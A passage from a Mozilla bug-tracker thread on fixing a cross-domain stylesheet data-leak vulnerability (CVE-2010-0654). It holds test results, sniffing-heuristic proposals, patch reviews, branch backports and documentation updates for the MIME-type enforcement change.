passed | Redirect 2 did not get right base URI
passed | Redirect 3 did not work
passed | Redirect 3 did not get right base URI
failed | Unexpected href for imported sheet - got "http://example.org/tests/layout/style/test/post-redirect-1.css", expected "http://localhost:8888/tests/layout/style/test/redirect.sjs?http://example.org/tests/layout/style/test/post-redirect-1.css"
todo | Rule href should be absolute - got "redirect.sjs?http://example.org/tests/layout/style/test/post-redirect-1.css", expected "http://localhost:8888/tests/layout/style/test/redirect.sjs?http://example.org/tests/layout/style/test/post-redirect-1.css"
failed | Unexpected href for imported sheet - got "http://example.org/tests/layout/style/test/post-redirect-2.css", expected "http://localhost:8888/tests/layout/style/test/redirect.sjs?http://example.org/tests/layout/style/test/post-redirect-2.css"
todo | Rule href should be absolute - got "redirect.sjs?http://example.org/tests/layout/style/test/post-redirect-2.css", expected "http://localhost:8888/tests/layout/style/test/redirect.sjs?http://example.org/tests/layout/style/test/post-redirect-2.css"
passed | Unexpected href one
passed | Should have the same href when not redirecting
passed | Unexpected href two
failed | Should have the same href when redirecting - got "http://localhost:8888/tests/layout/style/test/redirect.sjs?http://example.org/tests/layout/style/test/post-redirect-2.css", expected "http://example.org/tests/layout/style/test/post-redirect-2.css"
passed | Unexpected href three
failed | Should have the same href when redirecting again - got "http://localhost:8888/tests/layout/style/test/redirect.sjs?http://example.org/tests/layout/style/test/post-redirect-3.css", expected "http://example.org/tests/layout/style/test/post-redirect-3.css"

I believe, by inspecting the test, that the 10 remaining successes are all controls -- that is, they should succeed regardless of whether bug 397427 is fixed.
(In reply to comment #40)
> And, in particular, did you test that your test fails both for incorrect
> ignoring and for incorrect using of style sheets?

Yep.  In the version I'm about to commit, there are two debugging modes present (but disabled) in ccd.sjs that can be used to verify this.
Differences from previous edition are Boris' suggested change to the logging, and the aforementioned debugging modes in ccd.sjs.

http://hg.mozilla.org/mozilla-central/rev/b0cc8c093877
Attachment #418733 - Attachment is obsolete: true
Attachment #418737 - Attachment is obsolete: true
Blocks: 536606
Filed follow-up bug 536606 for the evangelism, and bug 536603 for an intermittent failure in the test case which smells like an httpd.js issue.  Also tagging for dev-docs -- this needs relnotes.

Release drivers: I think we need to give evangelism at least a month before this hits security updates; other than that, backport schedule is up to you.
Status: ASSIGNED → RESOLVED
Closed: 15 years ago
Keywords: dev-doc-needed
Resolution: --- → FIXED
Group: core-security
Whiteboard: [sg:moderate] embargoed until at least 2009-12-28, possibly as long as Apr-2010. webkit fix checked in → [sg:moderate]
I think we're making the right long-term decision here.  But to limit short-term damage to privacy/security without breaking sites too suddenly, perhaps we should take the yucky-heuristic patch on the 1.9.2 branch.

Does WebKit plan to change to a stricter approach?
I don't know what WebKit's longer term plans are. It would indeed be nice to rip out the more subtle logic and just insist on a correct MIME type.
Whiteboard: [sg:moderate] → [sg:moderate][3.6.x]
Is it at all realistic to get this into Firefox 3.5.8, or is there too much risk of site breakage to land that quickly?
blocking1.9.1: needed → ?
Here's an implementation of the "valid first initial construct" heuristic for 1.9.2, and I think it would be straightforward to backport to 1.9.1 as well, assuming the CSSLoader is more or less the same there.

Instead of modifying nsCSSParser, I wrote a second mini-parser that just answers the yes-no question "does the first thing in this string smell like CSS?"  based on the css2.1 "generic" grammar plus some bits of css3-selectors.  [The "generic" grammar by itself would do us no good, as its laxity is what got us into this mess in the first place!]  It's in the file nsCSSCheckInitialSyntax.cpp, and its API is one function:

  bool mozilla::CSS::InitialSyntaxIsValid(const nsAString& sheet);

To make this work I had to modify the CSSLoader so that it consumes the entire input stream in SheetLoadData::OnStreamComplete, and then hands a string rather than an nsIUnicharInputStream to the parser.  This *might* have performance implications, but note that we were already waiting to run the real parser until all the data came off the network, anyway.  And I want to make the same change on trunk so that I can do lazy computation of file position for error messages (but that's blocked on my deCOM patches, still waiting for review IIRC).

I need some advice on how I can test the mini-parser more thoroughly.  It is hardly ever invoked from the normal code paths, so a standalone xpcom unit test makes most sense to me, but I don't really know how to write those.
Attachment #420591 - Flags: review?(dbaron)
Probably the easiest way to write tests for it is to expose a function on something that calls it (maybe DOMWindowUtils) and then write the tests as mochitests.
blocking1.9.1: ? → needed
blocking2.0: --- → ?
(In reply to comment #53)
> Probably the easiest way to write tests for it is to expose a function on
> something that calls it (maybe DOMWindowUtils) and then write the tests as
> mochitests.

I like that idea.  Here's a revised patch with more tests for the parser, and several parser bugs fixed that the tests found.  I assume that for a branch patch I should be adding to nsDOMWindowUtils_1_9_2 rather than nsDOMWindowUtils.
Attachment #420591 - Attachment is obsolete: true
Attachment #420842 - Flags: review?(dbaron)
Attachment #420591 - Flags: review?(dbaron)
blocking2.0: ? → alpha1
Priority: -- → P1
An alternative heuristic occurred to me last week.  Detecting "this *is* CSS" is hard, because the selector syntax is very sloppy, but detecting "this *isn't* CSS" is easy for the cases we care about, and could be done in OnDetermineCharset without reading the entire sheet into memory, thus would be less invasive.  I think this sniffing algorithm would cover everything interesting: decode to Unicode, skip any initial sequence of ASCII whitespace, then blacklist if the next 16 characters include a control character other than whitespace (U+0000-0008, U+000E-001F, U+007F-009F) or the first characters after the whitespace are

 <    (HTML or XML)
 {    (JSON)
 %!   (PDF/PS)
 #!   (Unix-type script)
 !<   (Unix 'ar' archive)

The "next 16 characters include a control character" rule covers nearly all the image, video, audio, compressed, and machine-code formats I know about.  The big thing this can't catch is plain-text structured data with no magic number, such as JavaScript and CSV files.
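The sniffing algorithm described above could be sketched roughly like this (an illustrative stand-alone sketch with made-up names, not the actual Gecko implementation):

```cpp
#include <cassert>
#include <string>

// Hypothetical sketch of the "this isn't CSS" sniff described above:
// skip leading ASCII whitespace, blacklist known magic prefixes, then
// blacklist if a non-whitespace control character appears early on.
static bool LooksLikeNonCSS(const std::u16string& text) {
  size_t i = 0;
  // Skip any initial sequence of ASCII whitespace.
  while (i < text.size() && (text[i] == u' ' || text[i] == u'\t' ||
                             text[i] == u'\n' || text[i] == u'\r' ||
                             text[i] == u'\f'))
    ++i;
  if (i >= text.size())
    return false;  // all whitespace: nothing to blacklist

  // Magic prefixes: HTML/XML, JSON, PDF/PS, scripts, 'ar' archives.
  auto startsWith = [&](const char16_t* p) {
    return text.compare(i, std::char_traits<char16_t>::length(p), p) == 0;
  };
  if (text[i] == u'<' || text[i] == u'{' ||
      startsWith(u"%!") || startsWith(u"#!") || startsWith(u"!<"))
    return true;

  // Blacklist if the next 16 characters include a control character
  // other than whitespace (covers most binary formats).
  for (size_t j = i; j < text.size() && j < i + 16; ++j) {
    char16_t c = text[j];
    if (c <= 0x0008 || (c >= 0x000E && c <= 0x001F) ||
        (c >= 0x007F && c <= 0x009F))
      return true;
  }
  return false;
}
```

As noted, this happily passes "\<magic-number-free\>" plain text such as JavaScript or CSV, which is the main gap in the heuristic.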

The big reason *not* to do this, IMO, is that it's seriously inconsistent with what's been put into Webkit.
Alias: CVE-2010-0654
blocking1.9.2: --- → ?
status1.9.2: --- → ?
Flags: blocking1.9.0.19?
blocking1.9.2: ? → needed
Flags: blocking1.9.0.19? → blocking1.9.0.19-
Comment on attachment 420842 [details] [diff] [review]
1.9.2 branch patch (with heuristic) v2: more tests, bugs fixed

at a face-to-face meeting we agreed to do this differently.  Stay tuned.
Attachment #420842 - Flags: review?(dbaron)
Whether this ends up being a heuristic or some specific logic, please let the CSSWG know so it can be specified (or if they refuse to do it, let me know and I'll do it in HTML5 instead, though that would be inappropriate given @import).
(In reply to comment #4)
> Therefore, the solution devised was:
> - Reject a CSS load if all of these are met:
> a) It is cross-domain load (making sure a redirect does not confuse the domain
> check)!
> b) Not a valid MIME type (text/css, application/x-unknown-content-type or
> empty).
> c) The alleged CSS does not start with a syntactically valid CSS construct.
> 
> The above rules will block the attack because an HTML, XML etc. header will
> always cause a broken first CSS descriptor.


(In reply to comment #55)
> An alternative heuristic occurred to me last week.  Detecting "this *is* CSS"
> is hard, because the selector syntax is very sloppy, but detecting "this
> *isn't* CSS" is easy for the cases we care about, and could be done in
> OnDetermineCharset without reading the entire sheet into memory, thus would be
> less invasive.  I think this sniffing algorithm would cover everything
> interesting: decode to Unicode, skip any initial sequence of ASCII whitespace,
> then blacklist if the next 16 characters include a control character other than
> whitespace (U+0000-0008, U+000E-001F, U+007F-009F) or the first characters
> after the whitespace are
> 
>  <    (HTML or XML)

"<!--" is a valid CSS construct. I think it's even a fairly common first construct in external style sheets on the Web, but I don't have numbers at hand.

(In reply to comment #57)
> Whether this ends up being a heuristic or some specific logic, please let the
> CSSWG know so it can be specified (or if they refuse to do it, let me know and
> I'll do it in HTML5 instead, though that would be inappropriate given @import).

We intend any heuristic to be a stopgap for Firefox 3.6, and not to be standardized; the behavior in 3.7 and subsequent will be that the quirk rule at the end of HTML5 4.12.3.14 (Link type "stylesheet") is not applied for cross-domain loads.  In other words, even in quirks mode, a cross-domain stylesheet must be served as text/css, or without a Content-Type, to be applied.  That looks like a straightforward change on your end.
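The intended trunk behavior, combined with the accepted MIME types from comment 4 (text/css, application/x-unknown-content-type, or empty), can be summarized as follows. This is an illustrative sketch with hypothetical names, not the actual CSSLoader code:

```cpp
#include <cassert>
#include <string>

// Sketch of the planned Gecko 2.0 rule: the quirks-mode exemption for
// improper Content-Type headers no longer applies to cross-origin loads.
static bool AcceptStyleSheet(const std::string& contentType,
                             bool quirksMode, bool sameOrigin) {
  // A correct, unknown, or absent Content-Type is always accepted.
  if (contentType.empty() || contentType == "text/css" ||
      contentType == "application/x-unknown-content-type")
    return true;
  // Improper Content-Type: tolerated only for same-origin quirks loads.
  return quirksMode && sameOrigin;
}
```

Standards-mode documents already behaved this way for all loads; the only change is the `sameOrigin` restriction on the quirks-mode branch.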

dbaron probably knows better than me, but I don't see anything relevant specified in CSS at present.  I think maybe CSS should just say that @import behaves the same as a link to an external stylesheet resource from the non-CSS document at the root of the @import chain.

(In reply to comment #58)
> "<!--" is a valid CSS construct. I think it's even a fairly common first
> construct in external style sheets on the Web, but I don't have numbers at
> hand.

That's unfortunate; "<!--" is only a valid CSS construct for the sake of backward compatibility of *inline* style sheets with antediluvian browsers that don't understand the <style> tag.  There's no good reason for it ever to appear in an external style sheet.  Is it possible for you to get those numbers?
From what I gather after reading all this, the main documentation issue here is to mention that CSS won't be loaded cross-domain anymore if the MIME type isn't text/css? There's actually more going on than that, but that seems to be the main thing to mention, as well as perhaps that the syntax of CSS documents is checked a little more thoroughly than before. I don't really think specifics are needed.
(In reply to comment #60)
> From what I gather after reading all this, the main documentation issue here is
> to mention that CSS won't be loaded cross-domain anymore if the MIME type isn't
> text/css? There's actually more going on than that, but that seems to be the
> main thing to mention, as well as perhaps that the syntax of CSS documents is
> checked a little more thoroughly than before. I don't really think specifics
> are needed.

Yes, I think the documentation's position should be "serve CSS as text/css, and serve other things with their correct MIME types too".

Also, be very clear that this is only about quirks mode documents.  Standards mode documents have always enforced the correct MIME type on CSS.  Quirks mode documents will, going forward, require the correct MIME type on style loaded cross-domain.  There may be a backward compatibility heuristic added to 3.6 but it will only be for 3.6.
Will there be a particular sub-version of Gecko that has this fix? Will I be able to say that this will affect "Gecko 1.9.2.x"?
At any rate, I've added text on this subject here:

https://developer.mozilla.org/en/Properly_Configuring_Server_MIME_Types#Why_are_correct_MIME_types_important.3f

This note needs to be updated once we know specifically what version of Firefox & Gecko it applies to.
Safari 4.0.5 contains a fix, hopefully the same as Chrome's.  See CVE-2010-0051 on http://support.apple.com/kb/HT4070.
At the platform meeting ... two months ago already? geez, I'm slow ... dbaron asked that the 1.9.2 patch be rewritten to not involve a new miniparser on the side.  This I have now done.

Upside: no new miniparser, no need to slurp the entire style sheet before processing, no mucking around in xpcom/io.  Overall, considerably less invasive (a surprise to me, as the whole point of the miniparser was to make the patch less invasive).

Downside: easiest seen by looking at the changes to test_css_cross_domain_miniparser.html (which I did not bother renaming) -- because we're using the real parser, the first selector in the file must be semantically meaningful to this version of Gecko, not just well-formed.  That could potentially break a site that was in quirks mode, with a cross-domain style sheet, with the wrong MIME type, and the very first thing in that sheet was a shiny bleeding edge CSS selector that 1.9.2 doesn't recognize.

I leave it to product management to decide whether this is a better tradeoff than the previous patch had.

I also beefed up the error console diagnostics -- they distinguish cross-domain from non-cross-domain quirks mode style sheet loads, and if we bail out on the style sheet because of a syntax error, we say so.  This means string changes, unfortunately.

Will post links to try server builds when they complete.
Attachment #420842 - Attachment is obsolete: true
Attachment #438197 - Flags: review?(dbaron)
Attachment #438197 - Flags: approval1.9.2.4?
A few issues from skimming:
 * you can't make l10n changes on the branch (css.properties)
 * I'd prefer if the new DOMWindowUtils function checked for UniversalXPConnect just like most of the other DOMWindowUtils methods; your test can enable that trivially
 * I think it would be better to avoid modifying nsICSSParser; it's relatively avoidable (at worst, add nsICSSParser_MOZILLA_1_9_2_BRANCH)

I'd somewhat prefer to review a patch addressing those issues than going into a detailed review of this one.
(In reply to comment #66)
> A few issues from skimming:
>  * you can't make l10n changes on the branch (css.properties)

Is there no way around this?  Outreach to people who need to fix their websites will be a lot easier if the diagnostics are clear.

>  * I'd prefer if the new DOMWindowUtils function checked for UniversalXPConnect
> just like most of the other DOMWindowUtils methods; your test can enable that
> trivially

Ok

>  * I think it would be better to avoid modifying nsICSSParser; it's relatively
> avoidable (at worst, add nsICSSParser_MOZILLA_1_9_2_BRANCH)

I can't add methods to an XPCOM interface without bumping the IID, right?  So the only thing that comes to mind is sticking the bit into nsCSSStyleSheet and letting the parser know that all nsICSSStyleSheets are nsCSSStyleSheets.  Is that going to cause some other problem somewhere?

> I'd somewhat prefer to review a patch addressing those issues than going into a
> detailed review of this one.

Sure (but it won't be till Monday, regardless).
(In reply to comment #67)
> >  * I think it would be better to avoid modifying nsICSSParser; it's relatively
> > avoidable (at worst, add nsICSSParser_MOZILLA_1_9_2_BRANCH)
> 
> I can't add methods to an XPCOM interface without bumping the IID, right?  So
> the only thing that comes to mind is sticking the bit into nsCSSStyleSheet and
> letting the parser know that all nsICSSStyleSheets are nsCSSStyleSheets.  Is
> that going to cause some other problem somewhere?

If you add nsICSSParser_MOZILLA_1_9_2_BRANCH : public nsICSSParser, add a new method (and leave the old one with the old behavior... the implementation just calls the new one), and make the caller that needs the method QI to nsICSSParser_MOZILLA_1_9_2_BRANCH instead of nsICSSParser, you should be fine.
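A toy sketch of that branch-interface pattern (hypothetical method names and signatures, not the real nsICSSParser):

```cpp
#include <cassert>

// Toy sketch of the pattern described above: a derived interface adds
// the new method, the old method keeps its old behavior by forwarding,
// and only callers that need the check use the derived type.
struct nsICSSParser {
  virtual bool ParseSheet(const char* data) = 0;
  virtual ~nsICSSParser() = default;
};

struct nsICSSParser_MOZILLA_1_9_2_BRANCH : nsICSSParser {
  virtual bool ParseSheetMaybeCheck(const char* data,
                                    bool checkInitialSyntax) = 0;
};

struct CSSParserImpl final : nsICSSParser_MOZILLA_1_9_2_BRANCH {
  // Old entry point: unchanged behavior, never applies the new check.
  bool ParseSheet(const char* data) override {
    return ParseSheetMaybeCheck(data, /* checkInitialSyntax = */ false);
  }
  // New entry point; a leading '<' stands in for the real
  // "first construct isn't valid CSS" test.
  bool ParseSheetMaybeCheck(const char* data, bool check) override {
    return !(check && data[0] == '<');
  }
};
```

Since the frozen interface's vtable layout and IID are untouched, existing binary callers are unaffected; the CSSLoader QIs to the branch interface only when it actually needs the check.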

> Sure (but it won't be till Monday, regardless).

FWIW, I'll be mostly-unreachable next week.
(In reply to comment #67)
> Is there no way around this?  Outreach to people who need to fix their websites
> will be a lot easier if the diagnostics are clear.

English-only messages are a possibility.
Attachment #438197 - Flags: approval1.9.2.4?
This revision adds nsICSSParser_1_9_2, doesn't touch css.properties, and has the DOMWindowUtils hook check for UniversalXPConnect privileges.

The new nsICSSParser_1_9_2 method always does the check, and nsCSSLoader only QIs for that method when it needs the check done; this is just to minimize overhead.  SheetLoadData::ReportMimeProblem got a lot uglier, but I think it's the best that can be done given the l10n constraints.  (It's unfortunate that nsContentUtils does not have a ReportToConsole variant that takes the actual string to log rather than the localization tag.)
Attachment #438197 - Attachment is obsolete: true
Attachment #438558 - Flags: review?(dbaron)
Attachment #438558 - Flags: approval1.9.2.4?
Attached patch 1.9.2 patch backported to 1.9.1 (obsolete) — Splinter Review
This is the same as attachment 438558 [details] [diff] [review] but for 1.9.1. It builds, but I'm unfortunately not able to run the mochitests.
Attachment #439488 - Flags: review?
Attachment #439488 - Flags: review? → review?(dbaron)
Comment on attachment 438558 [details] [diff] [review]
1.9.2 branch patch with dbaron's high-level changes made

Moving nomination flag to 1.9.2.5 - don't think we want to mix this with OOPP, already doing enough this release :)
Attachment #438558 - Flags: approval1.9.2.4? → approval1.9.2.5?
Comment on attachment 438558 [details] [diff] [review]
1.9.2 branch patch with dbaron's high-level changes made

>+    if (mLoader->mCompatMode == eCompatibility_NavQuirks) {
>+      problem = MimeProblem_quirksload;
>+      if (mLoaderPrincipal) {
>+        PRBool subsumed;
>+        result = mLoaderPrincipal->Subsumes(principal, &subsumed);
>+        if (NS_FAILED(result) || !subsumed) {
>+          problem = MimeProblem_quirksload_xd;
>+          mCheckInitialSyntax = PR_TRUE;
>+        }
>+      }
>+    }

Is this the right handling of null mLoaderPrincipal, or should we assume
that that means cross-domain?  (Is this a case of null == system
principal?)



>-      NS_ASSERTION(aLinkingContent, "Inline stylesheet without linking content?");
>-      baseURI = aLinkingContent->GetBaseURI();
>-      sheetURI = aLinkingContent->GetDocument()->GetDocumentURI();
>-      originalURI = nsnull;
>-    } else {
>+        NS_ASSERTION(aLinkingContent, "Inline stylesheet without linking content?");
>+        baseURI = aLinkingContent->GetBaseURI();
>+        sheetURI = aLinkingContent->GetDocument()->GetDocumentURI();
>+        originalURI = nsnull;
>+      } else {

No need to reindent (or tabify, or whatever this is).

>+  rv = errObj->Init(formattedMessage.get(),
>+                    NS_ConvertUTF8toUTF16(referrer).get(),
>+                    nsnull, 0, 0, errorFlag, "CSS Loader");

Is EmptyString().get() better than nsnull?



Instead of changing SkipAtRule() to return false, I'd prefer if
you made its return type void and changed its callers to return
false in the two relevant locations.

I'd suggest also changing ParsePageRule to |return PR_TRUE|, with a
comment explaining that it's a temporary change just for the purpose of
this, so that we accept style sheets that start with @page.  (And add a
test for that case?)


r=dbaron with that
Attachment #438558 - Flags: review?(dbaron) → review+
Comment on attachment 439488 [details] [diff] [review]
1.9.2 patch backported to 1.9.1

Please redo the backport based on the new patch, *once it is revised to address the comments I just made*.  (And, in general, please don't request review on a backport for a patch that hasn't been reviewed yet; it just artificially increases apparent review load.)
Attachment #439488 - Flags: review?(dbaron) → review-
(In reply to comment #74)
> (From update of attachment 438558 [details] [diff] [review])
> >+    if (mLoader->mCompatMode == eCompatibility_NavQuirks) {
> >+      problem = MimeProblem_quirksload;
> >+      if (mLoaderPrincipal) {
> >+        PRBool subsumed;
> >+        result = mLoaderPrincipal->Subsumes(principal, &subsumed);
> >+        if (NS_FAILED(result) || !subsumed) {
> >+          problem = MimeProblem_quirksload_xd;
> >+          mCheckInitialSyntax = PR_TRUE;
> >+        }
> >+      }
> >+    }
> 
> Is this the right handling of null mLoaderPrincipal, or should we assume
> that that means cross-domain?  (Is this a case of null == system
> principal?)

I'm not familiar with any rules for when a null nsIPrincipal* pointer means the system principal and when it doesn't, but LoadSheet skips a CheckMayLoad call if mLoaderPrincipal is null, so that seems like it's supposed to mean the system principal in this context.  Also, it appears to me that mLoaderPrincipal will be null at this point only if a null origin principal was passed to InternalLoadNonDocumentSheet, which is only accessible to C++ as far as I can tell.

mLoaderPrincipal is also null for SheetLoadData objects created by LoadInlineStyle, but that code path goes directly to ParseSheet without calling OnStreamComplete, and the loader for child sheets always uses the sheet principal (== the node principal for the <style> tag, in this case).  And it's null for SheetLoadData objects created by PostLoadEvent, but it appears to me that that is only used for sheets which have already been loaded, and so will not come back to OnStreamComplete.

> No need to reindent (or tabify, or whatever this is).

That appears to have been me fatfingering the indentation there.  Fixed.

> >+  rv = errObj->Init(formattedMessage.get(),
> >+                    NS_ConvertUTF8toUTF16(referrer).get(),
> >+                    nsnull, 0, 0, errorFlag, "CSS Loader");
> 
> Is EmptyString().get() better than nsnull?

It comes to the same thing, since ultimately whatever we provide here is passed to the PRUnichar* overload of nsString::Assign(), which treats null as the empty string, but with a comment reading "unfortunately some callers pass null :-(", so maybe it should be changed to EmptyString().get() even though it's functionally equivalent - up to you.

> Instead of changing SkipAtRule() to return false, I'd prefer if
> you made its return type void and changed its callers to return
> false in the two relevant locations.

Done.

> I'd suggest also changing ParsePageRule to |return PR_TRUE|, with a
> comment explaining that it's a temporary change just for the purpose of
> this, so that we accept style sheets that start with @page.  (And add a
> test for that case?)

Done.

Tangential question: it occurs to me that we should, perhaps, make trunk do this heuristic for the case of an absent Content-Type header, since that officially does mean "sniff", and sites that leave HTML content untagged would still be vulnerable to this attack if we blindly assume untagged is good CSS (as we currently do on trunk).  On the other hand, that does mean we're stuck with the heuristic going forward; but it's not nearly so ugly as it was the first time around (and would be less ugly still on trunk, where I can change interfaces and strings ;)  What do you think?

I'll update the 1.9.1 backport.  Do we need a 1.9.0 backport still?
mLoaderPrincipal == null means we don't plan to use it or that the loader is system.  LoadInlineStyle should perhaps set the principal to that of the element just for consistency and we should document the meaning of null on the member.  My apologies for not having done that originally....
(In reply to comment #76)
> Tangential question: it occurs to me that we should, perhaps, make trunk do
> this heuristic for the case of an absent Content-Type header, since that
> officially does mean "sniff", and sites that leave HTML content untagged would
> still be vulnerable to this attack if we blindly assume untagged is good CSS
> (as we currently do on trunk).  On the other hand, that does mean we're stuck
> with the heuristic going forward; but it's not nearly so ugly as it was the
> first time around (and would be less ugly still on trunk, where I can change
> interfaces and strings ;)  What do you think?

I don't think so.

Either:

 (a) Unlabeled is supported, in which case we shouldn't inflict on it the horrible forwards-compatibility implications of this approach, or

 (b) Unlabeled is unsupported, in which case we should move towards rejecting it always.
Comment on attachment 438558 [details] [diff] [review]
1.9.2 branch patch with dbaron's high-level changes made

a=LegNeato for 1.9.2.5. Please ONLY land this on mozilla-1.9.2 default, as we
are still working on 1.9.2.4 on the relbranch
Attachment #438558 - Flags: approval1.9.2.5? → approval1.9.2.5+
http://hg.mozilla.org/releases/mozilla-1.9.2/rev/17391b64e790

With the changes indicated in comment 76.  Landed on mozilla-1.9.2 default only, as per comment 79.  1.9.1 backport to follow.
Attachment #438558 - Attachment is obsolete: true
Attachment #439488 - Attachment is obsolete: true
Keywords: relnote
Whiteboard: [sg:moderate][3.6.x] → [sg:moderate][3.5.x]
This might or might not need separate review but I am marking it for review anyway out of an abundance of caution.  Most of the differences from the 1.9.2 version have to do with ns(I)DOMWindowUtils not being in the same place on this branch.

I renamed all the _1_9_2 interfaces to _1_9_1, but I used the same UUID for nsICSSParser_1_9_1 on this branch as for nsICSSParser_1_9_2 on the 1.9.2 branch since the duck type is the same.  nsIDOMWindowUtils_1_9_1 does *not* have the same duck type so it gets a new UUID.  Please let me know if this is the wrong approach.
Attachment #447120 - Flags: review?(dbaron)
Attachment #447120 - Flags: approval1.9.1.11?
Attachment #447120 - Flags: approval1.9.1.10?
Comment on attachment 447120 [details] [diff] [review]
1.9.1 backport of as-landed 1.9.2 patch

r=dbaron

It would definitely be good to get this in in the 1.9.1 release matching the 1.9.2 release that has it.
Attachment #447120 - Flags: review?(dbaron) → review+
Comment on attachment 447120 [details] [diff] [review]
1.9.1 backport of as-landed 1.9.2 patch

a=beltzner for 1.9.1.11, please land on mozilla-1.9.2 default
Attachment #447120 - Flags: approval1.9.1.11?
Attachment #447120 - Flags: approval1.9.1.11+
Attachment #447120 - Flags: approval1.9.1.10?
(In reply to comment #83)
> (From update of attachment 447120 [details] [diff] [review])
> a=beltzner for 1.9.1.11, please land on mozilla-1.9.2 default

Errr - mozilla-1.9.1 default
http://hg.mozilla.org/releases/mozilla-1.9.1/rev/09eee2c3794f
Whiteboard: [sg:moderate][3.5.x] → [sg:moderate]
(In reply to comment #86)
> Documentation updated:
> 
> https://developer.mozilla.org/en/Incorrect_MIME_Type_for_CSS_Files
> https://developer.mozilla.org/en/Properly_Configuring_Server_MIME_Types

You documented the trunk behavior as if it applied to 3.5 and 3.6 as well, but that's not quite right.  3.5 and 3.6, to avoid breaking quite so many sites, will content-sniff a cross-domain load with the wrong MIME type and reject it only if the first thing in the file appears not to be a valid CSS construct.  Firefox 4 *will* just reject the load regardless of contents, though.
Ah! OK, that was unclear from the many comments here. I've updated those articles now.
Still not quite right, I'm afraid.  All of these changes only apply for *cross origin* stylesheet loads.  Quirks mode loads of same-origin stylesheets are same as they ever were, trunk and branches both.
Marking as verified for 1.9.1 and 1.9.2 based on passing checked in tests for this.
Attached patch 1.9.0 backport (obsolete) — Splinter Review
This is the backport I did for a Debian stable update.
Attachment #459893 - Flags: review?(dbaron)
I'm not familiar enough with code that old to criticize your backport in detail, Mike, but I'll mention a couple of high-level issues.

+      formattedMessage.AppendLiteral("  This cross-domain request will be "
+                                     "ignored by the next major release of "
+                                     "this browser.");

This diagnostic is going to be confusing coming from ff3.0.  Please change to something like "ignored by Gecko 1.9.3 (e.g. Firefox 4.0)".

+++ b/layout/style/test/ccd-standards.html

This test is unreliable if you don't also backport bug 536603.
(Gecko 1.9.3 was renamed to Gecko 2.0.)
(In reply to comment #92)
> I'm not familiar enough with code that old to criticize your backport in
> detail, Mike, but I'll mention a couple of high-level issues.
> 
> +      formattedMessage.AppendLiteral("  This cross-domain request will be "
> +                                     "ignored by the next major release of "
> +                                     "this browser.");
> 
> This diagnostic is going to be confusing coming from ff3.0.  Please change to
> something like "ignored by Gecko 1.9.3 (e.g. Firefox 4.0)".

Fair enough, but please note that I backported the patch from ff3.5... which means ff3.5 says the same.
Comment on attachment 459893 [details] [diff] [review]
1.9.0 backport

> PRBool CSSParserImpl::ParsePageRule(nsresult& aErrorCode, RuleAppendFunc aAppendFunc, void* aData)
> {
>-  // XXX not yet implemented

Don't remove the "XXX not yet implemented" comment; it wasn't
removed in the original.

It looks like your patch dropped the three deletes of empty files
layout/style/test/redirect-{1,2,3}.css .  Is that a git quirk?  Please make
sure they get CVS removed if they're supposed to be removed.

r=dbaron with that fixed, though I can't really say I remember what's
different about the CSS parser since 1.9.

Please make sure that all layout/style/test mochitests pass before you land.
Attachment #459893 - Flags: review?(dbaron) → review+
That said, I really don't see why you want to backport this to 1.9.0; I think there are many much-more-serious security bugs that are unfixed on that (unsupported) branch.  I'd prefer leaving it alone.
(In reply to comment #95)
> It looks like your patch dropped the three deletes of empty files
> layout/style/test/redirect-{1,2,3}.css .  Is that a git quirk?  Please make
> sure they get CVS removed if they're supposed to be removed.

Looks like a quirk from when I applied the patch on my local tree.

> r=dbaron with that fixed, though I can't really say I remember what's
> different about the CSS parser since 1.9.
> 
> Please make sure that all layout/style/test mochitests pass before you land.

I did.

(In reply to comment #96)
> That said, I really don't see why you want to backport this to 1.9.0; I think
> there are many much-more-serious security bugs that are unfixed on that
> (unsupported) branch.  I'd prefer leaving it alone.

Debian is still supporting the 3.0 code base. I have backported all security fixes that affect 3.0 (except the Math.random one), and most of the time the patches apply without modification. Only when I do have to modify a patch do I send it in for review, partly so no one else has to redo the work.
Attached patch 1.9.0 backportSplinter Review
Addressed dbaron's comments, and modified warning message per comment 92.
Attachment #459893 - Attachment is obsolete: true